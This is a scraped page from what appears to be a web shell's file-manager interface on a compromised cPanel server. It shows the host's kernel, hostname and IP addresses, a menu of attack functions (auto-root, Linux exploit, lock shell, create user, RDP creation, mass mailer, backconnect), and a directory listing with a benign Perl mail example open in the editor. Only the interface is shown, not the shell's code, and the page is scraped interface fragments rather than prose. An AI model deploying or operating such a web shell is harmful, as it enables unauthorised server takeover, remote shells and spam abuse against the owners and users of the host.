Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.58.136
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libmailtools-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
forwd_demo
797
B
-rwxr-xr-x
forwd_demo.PL
1.14
KB
-rw-r--r--
mail-mailer.pl
3.16
KB
-rw-r--r--
rplyto_demo
415
B
-rwxr-xr-x
rplyto_demo.PL
791
B
-rw-r--r--
send_demo
1.51
KB
-rwxr-xr-x
send_demo.PL
1.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rplyto_demo
#!/usr/bin/perl -w use Mail::Internet; $mail = Mail::Internet->new([<>]); $rply = $mail->reply(Keep => [qw(Newsgroups)]); $file = "/tmp/reply.$$"; open(REPLY,">$file") || die "Cannot open $file:$!\n"; $rply->print(\*REPLY); close(REPLY); $editor = $ENV{"EDITOR"} || die "\$EDITOR not defined\n"; warn "$editor :$!\n" if (system("$editor $file")); # Cleanup unlink($file,$file . '%',$file . '~'); exit 0;
Close